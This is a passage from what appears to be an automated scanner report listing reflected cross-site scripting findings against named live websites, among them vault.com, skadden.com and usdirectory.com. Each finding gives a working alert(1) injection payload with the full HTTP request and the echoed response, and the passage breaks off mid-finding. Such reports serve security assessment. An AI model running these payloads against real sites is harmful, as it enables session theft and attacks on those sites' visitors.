Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138997
Date: Wed, 19 Jan 2011 16:55:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=j2ua4c45yad2fi450tpoco55; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22abc1a";bdb542a73ab&loc=Dallas%2c+TX&kw=law+offices&uid=ee28739b-dce3-4ad1-af39-ce25887ac7db&expdate=634336161121623015&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22abc1a%22%253bbdb542a73ab&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:55:12 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22abc1a";bdb542a73ab&exp=634310259121623015; domain=local.com; expires=Wed, 19-Jan-2011 17:25:12 GMT; path=/
Content-Length: 138997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
offices";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Businesses - SERP - SEM";
s.prop8="";
s.campaign = "2531/x22abc1a";bdb542a73ab";
s.eVar1="v3:Businesses - SERP - SEM";
s.eVar5="v3:Businesses - SERP - SEM";
s.eVar6="Attorneys & Lawyers: General Practice";
s.eVa
...[SNIP]...

4.121. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb72"style="x:expression(alert(1))"4ccefb20720 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22&dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138662
Date: Wed, 19 Jan 2011 16:56:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=blu1lc45gh00cti30geojtrb; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22&loc=Dallas%2c+TX&kw=law+offices&uid=b78384a3-ca52-4529-b52d-d9bd5fffc842&expdate=634336161669772654&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22%26dbb72%22style%253d%22x%253aexpression(alert(1))%224ccefb20720%3d1&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:56:06 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22&exp=634310259669772654; domain=local.com; expires=Wed, 19-Jan-2011 17:26:06 GMT; path=/
Content-Length: 138662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=law offices&CID=2531/x22&dbb72"style="x:expression(alert(1))"4ccefb20720=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.122. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mckennacuneo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b15f'><script>alert(1)</script>1d12d371487 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5b15f'><script>alert(1)</script>1d12d371487=1 HTTP/1.1
Host: www.mckennacuneo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:52:37 GMT
Server: Apache/2.2.15 (FreeBSD)
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15847

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.1//EN' 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<meta http-equiv='Content-Type' content='text/html;
...[SNIP]...
<a id='emailThisPage' href='/?5b15f'><script>alert(1)</script>1d12d371487=1&email-this-page' rel='nofollow'>
...[SNIP]...

4.123. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /2011insights.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86470"-alert(1)-"c4c00aee9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011insights.cfm?86470"-alert(1)-"c4c00aee9af=1 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2C86470%22%2Dalert%281%29%2D%22c4c00aee9af%3D1;expires=Fri, 11-Jan-2041 15:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E
...[SNIP]...
<script type="text/javascript">
extra = "height="+screen.height+",width="+screen.width+",location=no";
function printWindow(){
window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&86470"-alert(1)-"c4c00aee9af=1","PDF",extra)
}

function pdfWindow(url){
window.open(url,"PDF",extra);
}
</script>
...[SNIP]...

4.124. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bb3"-alert(1)-"0eb36443031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm?contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478%2690bb3%22%2Dalert%281%29%2D%220eb36443031%3D1;expires=Fri, 11-Jan-2041 15:14:54 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                               <!DOCTYPE html PUB
...[SNIP]...
"text/javascript">
extra = "height="+screen.height+",width="+screen.width+",location=no";
function printWindow(){
window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1","PDF",extra)
}

function pdfWindow(url){
window.open(url,"PDF",extra);
}
</script>
...[SNIP]...

4.125. http://www.usdirectory.com/gypr.aspx [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usdirectory.com
Path:   /gypr.aspx

Issue detail

The value of the cc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ab29'%3balert(1)//2894fafc0c6 was submitted in the cc parameter. This input was echoed as 4ab29';alert(1)//2894fafc0c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gypr.aspx?afid=1993&cc=54111051004ab29'%3balert(1)//2894fafc0c6&cr=3209505169&ct=Washington/x22 HTTP/1.1
Host: www.usdirectory.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:08 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:08 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
var switch_open_once_only=1;
       function open_once_only(){
           if(switch_open_once_only){
document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=3209505169&oid=&cc=54111051004ab29';alert(1)//2894fafc0c6';    
switch_open_once_only=0;
           }
       }
       function quicksearchform_onsubmit() {
           var form = document.forms.quicksearchform;
           var str = form.qhqn.value;
           
           /*if( document.getElementB
...[SNIP]...

4.126. http://www.usdirectory.com/gypr.aspx [cr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usdirectory.com
Path:   /gypr.aspx

Issue detail

The value of the cr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5878e'%3balert(1)//136c0518b8b was submitted in the cr parameter. This input was echoed as 5878e';alert(1)//136c0518b8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gypr.aspx?afid=1993&cc=5411105100&cr=32095051695878e'%3balert(1)//136c0518b8b&ct=Washington/x22 HTTP/1.1
Host: www.usdirectory.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:19 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:18 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <m
...[SNIP]...
xt/javascript">
       var switch_open_once_only=1;
       function open_once_only(){
           if(switch_open_once_only){
document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=32095051695878e';alert(1)//136c0518b8b&oid=&cc=5411105100';    
switch_open_once_only=0;
           }
       }
       function quicksearchform_onsubmit() {
           var form = document.forms.quicksearchform;
           var str = form.qhqn.value;
           
           /*if( d
...[SNIP]...

4.127. http://www.vault.com/wps/portal/usa/rankings/individual [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c40'%3balert(1)//dba4d06d54c was submitted in the REST URL parameter 4. This input was echoed as f6c40';alert(1)//dba4d06d54c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankingsf6c40'%3balert(1)//dba4d06d54c/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:10:14 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvo2BvA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAJrt8L0!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000DmxfkY9YKAx1Q4mLBLNSFjN:140i3s34m; Path=/
Keep-Alive: timeout=10, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:18 GMT;path=/
Content-Length: 68250


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
ideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankingsf6c40';alert(1)//dba4d06d54c/individual'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google
...[SNIP]...

4.128. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8325'-alert(1)-'adbf0a50b51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?c8325'-alert(1)-'adbf0a50b51=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:52 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000YsvtmY0WeGqmBw8q3S7jS3Y:140i3s34m; Path=/
Keep-Alive: timeout=10, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:57 GMT;path=/
Content-Length: 104769


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?c8325'-alert(1)-'adbf0a50b51=1'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenge
...[SNIP]...

4.129. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1411"><script>alert(1)</script>54ec8343c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:49 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000qF5wpbf0wl-7odhNiMXKAn9:140i3s34m; Path=/
Keep-Alive: timeout=10, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:53 GMT;path=/
Content-Length: 104190


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/
...[SNIP]...

4.130. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72071"><script>alert(1)</script>cbaa09597bd was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=272071"><script>alert(1)</script>cbaa09597bd&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:58 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000PjHkXd4fWrCD7JGVNx5m439:140i3s34m; Path=/
Keep-Alive: timeout=10, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:03 GMT;path=/
Content-Length: 67444


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=272071"><script>alert(1)</script>cbaa09597bd&rankingId2=-1&rankings=1&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Ema
...[SNIP]...

4.131. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aad31'-alert(1)-'06716bb157a was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2aad31'-alert(1)-'06716bb157a&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:02 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000WFjo2zwl_9oEr80PpKWu5gg:140i3s34m; Path=/
Keep-Alive: timeout=10, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:07 GMT;path=/
Content-Length: 68247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
TML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2aad31'-alert(1)-'06716bb157a&rankingId2=-1&rankings=1&regionId=0/x22'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,
...[SNIP]...

4.132. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa29d"><script>alert(1)</script>5276a27416 was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d"><script>alert(1)</script>5276a27416&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:14 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; Path=/
Keep-Alive: timeout=10, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:19 GMT;path=/
Content-Length: 105551


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d"><script>alert(1)</script>5276a27416&rankings=1&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://w
...[SNIP]...

4.133. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3ee'-alert(1)-'98bd799206f was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-17c3ee'-alert(1)-'98bd799206f&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

